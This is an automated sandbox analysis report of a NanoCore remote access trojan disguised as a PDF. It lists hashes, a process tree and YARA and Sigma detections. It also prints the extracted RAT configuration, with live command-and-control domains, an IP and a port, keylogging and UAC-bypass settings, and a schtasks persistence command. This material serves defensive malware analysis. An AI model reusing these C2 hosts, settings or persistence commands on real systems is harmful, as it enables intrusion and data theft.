Windows Analysis Report
004349256789197.pdf.scr.exe

Overview

General Information

Sample Name: 004349256789197.pdf.scr.exe
Analysis ID: 798041
MD5: 3ac05bbe35293fbfd0df49ecfb34c461
SHA1: ee12d93ac5f81036e920bb8c05638aa4e6c1f3bf
SHA256: 576263fb3c88934ebdb0aa6071f3a980710c9dfd2a3d63d09b0aa76f1caac9e7
Tags: exe

Detection

Nanocore
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Sigma detected: NanoCore
Detected Nanocore Rat
Yara detected AntiVM autoit script
Antivirus detection for URL or domain
Antivirus detection for dropped file
Yara detected Nanocore RAT
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Sigma detected: Scheduled temp file as task from temp location
Multi AV Scanner detection for dropped file
Starts an encoded Visual Basic Script (VBE)
Creates multiple autostart registry keys
Initial sample is a PE file and has a suspicious name
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Allocates memory in foreign processes
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Creates autostart registry keys with suspicious values (likely registry only malware)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses an obfuscated file name to hide its real file extension (double extension)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses dynamic DNS services
Writes to foreign memory regions
Protects its processes via BreakOnTermination flag
C2 URLs / IPs found in malware configuration
Found API chain indicative of sandbox detection
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
OS version to string mapping found (often used in BOTs)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to shutdown / reboot the system
Contains functionality to query the security center for anti-virus and firewall products
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to communicate with device drivers
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
AV process strings found (often used to terminate AV products)
Installs a raw input device (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
File is packed with WinRar
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Contains functionality to launch a program with higher privileges
Contains functionality to simulate mouse events
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Classification

  • System is w10x64
  • 004349256789197.pdf.scr.exe (PID: 912 cmdline: C:\Users\user\Desktop\004349256789197.pdf.scr.exe MD5: 3AC05BBE35293FBFD0DF49ECFB34C461)
    • wscript.exe (PID: 5348 cmdline: "C:\Windows\System32\wscript.exe" laklj-aowdkfxknm.xml.vbe MD5: 7075DD7B9BE8807FCA93ACD86F724884)
      • ihgsvw.exe (PID: 5624 cmdline: "C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe" ccmbpoh.docx MD5: 797174324A2A71F55AD4E89DA918B52D)
        • RegSvcs.exe (PID: 3008 cmdline: C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
          • schtasks.exe (PID: 4524 cmdline: schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmpA401.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
            • conhost.exe (PID: 4876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • schtasks.exe (PID: 5040 cmdline: schtasks.exe" /create /f /tn "DHCP Monitor Task" /xml "C:\Users\user\AppData\Local\Temp\tmpAA3C.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
            • conhost.exe (PID: 5116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • ihgsvw.exe (PID: 5040 cmdline: "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe" C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC MD5: 797174324A2A71F55AD4E89DA918B52D)
            • RegSvcs.exe (PID: 1724 cmdline: C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
  • RegSvcs.exe (PID: 3784 cmdline: C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe 0 MD5: 2867A3817C9245F7CF518524DFD18F28)
    • conhost.exe (PID: 3956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • ihgsvw.exe (PID: 2200 cmdline: "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe" C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC MD5: 797174324A2A71F55AD4E89DA918B52D)
    • RegSvcs.exe (PID: 2756 cmdline: C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
  • dhcpmon.exe (PID: 5176 cmdline: "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" 0 MD5: 2867A3817C9245F7CF518524DFD18F28)
    • conhost.exe (PID: 2220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • wscript.exe (PID: 1840 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\Update.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • ihgsvw.exe (PID: 5948 cmdline: "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe" C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC MD5: 797174324A2A71F55AD4E89DA918B52D)
      • RegSvcs.exe (PID: 2884 cmdline: C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
  • dhcpmon.exe (PID: 2344 cmdline: "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" MD5: 2867A3817C9245F7CF518524DFD18F28)
    • conhost.exe (PID: 3696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • wscript.exe (PID: 3384 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\Update.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • ihgsvw.exe (PID: 2788 cmdline: "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe" C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC MD5: 797174324A2A71F55AD4E89DA918B52D)
      • RegSvcs.exe (PID: 5632 cmdline: C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
  • ihgsvw.exe (PID: 5648 cmdline: "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe" C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC MD5: 797174324A2A71F55AD4E89DA918B52D)
    • RegSvcs.exe (PID: 4588 cmdline: C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
  • wscript.exe (PID: 5884 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\Update.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • ihgsvw.exe (PID: 5304 cmdline: "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe" C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC MD5: 797174324A2A71F55AD4E89DA918B52D)
      • RegSvcs.exe (PID: 4768 cmdline: C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
  • cleanup
{"Version": "1.2.2.0", "Mutex": "d95e5ad5-6193-4689-a919-7befded6", "Group": "ITEego", "Domain1": "december2n.duckdns.org", "Domain2": "december2nd.ddns.net", "Port": 60705, "KeyboardLogging": "Enable", "RunOnStartup": "Enable", "RequestElevation": "Disable", "BypassUAC": "Enable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Enable", "SetCriticalProcess": "Enable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Enable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 29996, "MutexTimeout": 4996, "LanTimeout": 2500, "WanTimeout": 8009, "BufferSize": "02000100", "MaxPacketSize": "", "GCThreshold": "", "BypassUserAccountControlData": "<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo />\r\n  <Triggers />\r\n  <Principals>\r\n    <Principal id=\"Author\">\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <IdleSettings>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <Priority>4</Priority>\r\n  </Settings>\r\n  <Actions Context=\"Author\">\r\n    <Exec>\r\n      
<Command>\"#EXECUTABLEPATH\"</Command>\r\n      <Arguments>$(Arg0)</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task"}
Source | Rule | Description | Author | Strings
00000011.00000003.352579534.0000000001962000.00000004.00000020.00020000.00000000.sdmp | Nanocore_RAT_Gen_2 | Detetcs the Nanocore RAT | Florian Roth (Nextron Systems)
  • 0xfcc5:$x1: NanoCore.ClientPluginHost
  • 0x2c465:$x1: NanoCore.ClientPluginHost
  • 0xfd02:$x2: IClientNetworkHost
  • 0x2c4a2:$x2: IClientNetworkHost
  • 0x13835:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
  • 0x2ffd5:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000011.00000003.352579534.0000000001962000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Nanocore | Yara detected Nanocore RAT | Joe Security
    00000011.00000003.352579534.0000000001962000.00000004.00000020.00020000.00000000.sdmp | NanoCore | unknown | Kevin Breen <kevin@techanarchy.net>
    • 0xfa2d:$a: NanoCore
    • 0xfa3d:$a: NanoCore
    • 0xfc71:$a: NanoCore
    • 0xfc85:$a: NanoCore
    • 0xfcc5:$a: NanoCore
    • 0x2c1cd:$a: NanoCore
    • 0x2c1dd:$a: NanoCore
    • 0x2c411:$a: NanoCore
    • 0x2c425:$a: NanoCore
    • 0x2c465:$a: NanoCore
    • 0xfa8c:$b: ClientPlugin
    • 0xfc8e:$b: ClientPlugin
    • 0xfcce:$b: ClientPlugin
    • 0x2c22c:$b: ClientPlugin
    • 0x2c42e:$b: ClientPlugin
    • 0x2c46e:$b: ClientPlugin
    • 0xfbb3:$c: ProjectData
    • 0x2c353:$c: ProjectData
    • 0x105ba:$d: DESCrypto
    • 0x2cd5a:$d: DESCrypto
    • 0x17f86:$e: KeepAlive
    00000011.00000003.352579534.0000000001962000.00000004.00000020.00020000.00000000.sdmp | Windows_Trojan_Nanocore_d8c4e3c5 | unknown | unknown
    • 0xfcc5:$a1: NanoCore.ClientPluginHost
    • 0x2c465:$a1: NanoCore.ClientPluginHost
    • 0xfc85:$a2: NanoCore.ClientPlugin
    • 0x2c425:$a2: NanoCore.ClientPlugin
    • 0x11bde:$b1: get_BuilderSettings
    • 0x2e37e:$b1: get_BuilderSettings
    • 0xfae1:$b2: ClientLoaderForm.resources
    • 0x2c281:$b2: ClientLoaderForm.resources
    • 0x112fe:$b3: PluginCommand
    • 0x2da9e:$b3: PluginCommand
    • 0xfcb6:$b4: IClientAppHost
    • 0x2c456:$b4: IClientAppHost
    • 0x1a136:$b5: GetBlockHash
    • 0x368d6:$b5: GetBlockHash
    • 0x12236:$b6: AddHostEntry
    • 0x2e9d6:$b6: AddHostEntry
    • 0x15f29:$b7: LogClientException
    • 0x326c9:$b7: LogClientException
    • 0x121a3:$b8: PipeExists
    • 0x2e943:$b8: PipeExists
    • 0xfcef:$b9: IClientLoggingHost
    00000011.00000003.353786178.0000000004299000.00000004.00000020.00020000.00000000.sdmp | Nanocore_RAT_Gen_2 | Detetcs the Nanocore RAT | Florian Roth (Nextron Systems)
    • 0xffad:$x1: NanoCore.ClientPluginHost
    • 0xffea:$x2: IClientNetworkHost
    • 0x13b1d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
    Source | Rule | Description | Author | Strings
    29.3.ihgsvw.exe.133eea0.1.raw.unpack | Nanocore_RAT_Gen_2 | Detetcs the Nanocore RAT | Florian Roth (Nextron Systems)
    • 0x1018d:$x1: NanoCore.ClientPluginHost
    • 0x101ca:$x2: IClientNetworkHost
    • 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
    29.3.ihgsvw.exe.133eea0.1.raw.unpack | Nanocore_RAT_Feb18_1 | Detects Nanocore RAT | Florian Roth (Nextron Systems)
    • 0xff05:$x1: NanoCore Client.exe
    • 0x1018d:$x2: NanoCore.ClientPluginHost
    • 0x117c6:$s1: PluginCommand
    • 0x117ba:$s2: FileCommand
    • 0x1266b:$s3: PipeExists
    • 0x18422:$s4: PipeCreated
    • 0x101b7:$s5: IClientLoggingHost
    29.3.ihgsvw.exe.133eea0.1.raw.unpack | JoeSecurity_Nanocore | Yara detected Nanocore RAT | Joe Security
      29.3.ihgsvw.exe.133eea0.1.raw.unpack | MALWARE_Win_NanoCore | Detects NanoCore | ditekSHen
      • 0xfef5:$x1: NanoCore Client
      • 0xff05:$x1: NanoCore Client
      • 0x1014d:$x2: NanoCore.ClientPlugin
      • 0x1018d:$x3: NanoCore.ClientPluginHost
      • 0x10142:$i1: IClientApp
      • 0x10163:$i2: IClientData
      • 0x1016f:$i3: IClientNetwork
      • 0x1017e:$i4: IClientAppHost
      • 0x101a7:$i5: IClientDataHost
      • 0x101b7:$i6: IClientLoggingHost
      • 0x101ca:$i7: IClientNetworkHost
      • 0x101dd:$i8: IClientUIHost
      • 0x101eb:$i9: IClientNameObjectCollection
      • 0x10207:$i10: IClientReadOnlyNameObjectCollection
      • 0xff54:$s1: ClientPlugin
      • 0x10156:$s1: ClientPlugin
      • 0x1064a:$s2: EndPoint
      • 0x10653:$s3: IPAddress
      • 0x1065d:$s4: IPEndPoint
      • 0x12093:$s6: get_ClientSettings
      • 0x12637:$s7: get_Connected
      29.3.ihgsvw.exe.133eea0.1.raw.unpack | NanoCore | unknown | Kevin Breen <kevin@techanarchy.net>
      • 0xfef5:$a: NanoCore
      • 0xff05:$a: NanoCore
      • 0x10139:$a: NanoCore
      • 0x1014d:$a: NanoCore
      • 0x1018d:$a: NanoCore
      • 0xff54:$b: ClientPlugin
      • 0x10156:$b: ClientPlugin
      • 0x10196:$b: ClientPlugin
      • 0x1007b:$c: ProjectData
      • 0x10a82:$d: DESCrypto
      • 0x1844e:$e: KeepAlive
      • 0x1643c:$g: LogClientMessage
      • 0x12637:$i: get_Connected
      • 0x10db8:$j: #=q
      • 0x10de8:$j: #=q
      • 0x10e04:$j: #=q
      • 0x10e34:$j: #=q
      • 0x10e50:$j: #=q
      • 0x10e6c:$j: #=q
      • 0x10e9c:$j: #=q
      • 0x10eb8:$j: #=q

      AV Detection

      Source: File created, Author: Joe Security, Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, ProcessId: 3008, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

      E-Banking Fraud

      Source: File created, Author: Joe Security, Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, ProcessId: 3008, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

      Persistence and Installation Behavior

      Source: Process started, Author: Joe Security, Data: Command: schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmpA401.tmp, CommandLine: schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmpA401.tmp, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe, ParentImage: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, ParentProcessId: 3008, ParentProcessName: RegSvcs.exe, ProcessCommandLine: schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmpA401.tmp, ProcessId: 4524, ProcessName: schtasks.exe

      Stealing of Sensitive Information

      Source: File created, Author: Joe Security, Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, ProcessId: 3008, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

      Remote Access Functionality

      Source: File created, Author: Joe Security, Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, ProcessId: 3008, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat
      No Snort rule has matched

      AV Detection

      Source: december2nd.ddns.net, Avira URL Cloud: Label: malware
      Source: december2n.duckdns.org, Avira URL Cloud: Label: malware
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe, Avira: detection malicious, Label: DR/AutoIt.Gen
      Source: 004349256789197.pdf.scr.exe, ReversingLabs: Detection: 44%
      Source: 004349256789197.pdf.scr.exe, Virustotal: Detection: 39%
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe, ReversingLabs: Detection: 26%
      Source: 22.2.RegSvcs.exe.720000.0.unpack, Avira: Label: TR/Dropper.MSIL.Gen7
      Source: 10.2.RegSvcs.exe.6210000.7.unpack, Avira: Label: TR/NanoCore.fadte
      Source: 00000016.00000002.376441556.0000000003BE9000.00000004.00000800.00020000.00000000.sdmp, Malware Configuration Extractor: NanoCore (same configuration as listed after the process tree)
      Source: 004349256789197.pdf.scr.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: 004349256789197.pdf.scr.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
      Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 004349256789197.pdf.scr.exe, 00000000.00000000.244080048.0000000000403000.00000002.00000001.01000000.00000003.sdmp, 004349256789197.pdf.scr.exe, 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: RegSvcs.pdb, source: RegSvcs.exe, 0000000A.00000003.315104823.0000000001033000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000000.310040164.0000000000362000.00000002.00000001.01000000.0000000D.sdmp
      Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\NanoProtectPlugin\NanoProtectClient\obj\Debug\NanoProtectClient.pdb source: RegSvcs.exe, 0000000A.00000002.784950885.0000000006200000.00000004.00000001.00040000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.774805901.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000016.00000002.376441556.0000000003BE9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000016.00000002.375961002.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: RegSvcs.pdb source: RegSvcs.exe, 0000000A.00000003.315104823.0000000001033000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000000.310040164.0000000000362000.00000002.00000001.01000000.0000000D.sdmp
      Source: C:\Windows\SysWOW64\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini
      Source: C:\Windows\SysWOW64\wscript.exe File opened: C:\Users\user
      Source: C:\Windows\SysWOW64\wscript.exe File opened: C:\Users\user\AppData\Roaming
      Source: C:\Windows\SysWOW64\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
      Source: C:\Windows\SysWOW64\wscript.exe File opened: C:\Users\user\AppData
      Source: C:\Windows\SysWOW64\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: 0_2_003DA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_003DA69B
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: 0_2_003EC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_003EC220
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: 0_2_003FB348 FindFirstFileExA,0_2_003FB348
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00C0E387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,6_2_00C0E387
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00C0D836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,6_2_00C0D836
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00C1A0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,6_2_00C1A0FA
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00C1A488 FindFirstFileW,Sleep,FindNextFileW,FindClose,6_2_00C1A488
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00C165F1 FindFirstFileW,FindNextFileW,FindClose,6_2_00C165F1
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00BDC642 FindFirstFileExW,6_2_00BDC642
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00C172E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,6_2_00C172E9
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00C17248 FindFirstFileW,FindClose,6_2_00C17248

      Networking

      Source: unknown DNS query: name: december2n.duckdns.org
      Source: unknown DNS query: name: december2nd.ddns.net
      Source: Malware configuration extractor URLs: december2n.duckdns.org
      Source: Malware configuration extractor URLs: december2nd.ddns.net
      Source: Joe Sandbox View ASN Name: SPD-NETTR SPD-NETTR
      Source: Joe Sandbox View IP Address: 212.193.30.230 212.193.30.230
      Source: global traffic TCP traffic: 192.168.2.7:49714 -> 212.193.30.230:60705
      Source: 004349256789197.pdf.scr.exe, 00000000.00000003.264105403.0000000006D09000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
      Source: 004349256789197.pdf.scr.exe, 00000000.00000003.264105403.0000000006D09000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
      Source: 004349256789197.pdf.scr.exe, 00000000.00000003.264105403.0000000006D09000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
      Source: 004349256789197.pdf.scr.exe, 00000000.00000003.264105403.0000000006D09000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
      Source: 004349256789197.pdf.scr.exe, 00000000.00000003.264105403.0000000006D09000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
      Source: 004349256789197.pdf.scr.exe, 00000000.00000003.264105403.0000000006D09000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
      Source: 004349256789197.pdf.scr.exe, 00000000.00000003.264105403.0000000006D09000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
      Source: 004349256789197.pdf.scr.exe, 00000000.00000003.264105403.0000000006D09000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp2.globalsign.com/rootr306
      Source: 004349256789197.pdf.scr.exe, 00000000.00000003.264105403.0000000006D09000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp2.globalsign.com/rootr606
      Source: RegSvcs.exe, 0000000A.00000002.774805901.0000000002C31000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: 004349256789197.pdf.scr.exe, 00000000.00000003.264105403.0000000006D09000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
      Source: 004349256789197.pdf.scr.exe, 00000000.00000003.264105403.0000000006D09000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
      Source: 004349256789197.pdf.scr.exe, 00000000.00000003.264105403.0000000006D09000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.autoitscript.com/autoit3/
      Source: 004349256789197.pdf.scr.exe, 00000000.00000003.264105403.0000000006D09000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.globalsign.com/repository/0
      Source: unknown DNS traffic detected: queries for: december2n.duckdns.org
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00C0A54A GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,6_2_00C0A54A
      Source: RegSvcs.exe, 0000000A.00000002.785005873.0000000006210000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: RegisterRawInputDevices

      E-Banking Fraud


      Operating System Destruction

      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: 01 00 00 00

      System Summary

      Source: 29.3.ihgsvw.exe.133eea0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 29.3.ihgsvw.exe.133eea0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
      Source: 29.3.ihgsvw.exe.133eea0.1.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 29.3.ihgsvw.exe.133eea0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 29.3.ihgsvw.exe.12d5e90.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 29.3.ihgsvw.exe.12d5e90.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
